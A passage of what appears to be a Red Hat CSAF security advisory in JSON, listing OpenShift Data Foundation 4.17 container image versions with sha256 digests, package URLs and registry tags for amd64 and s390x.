"purl": "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_id": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_identification_helper": {
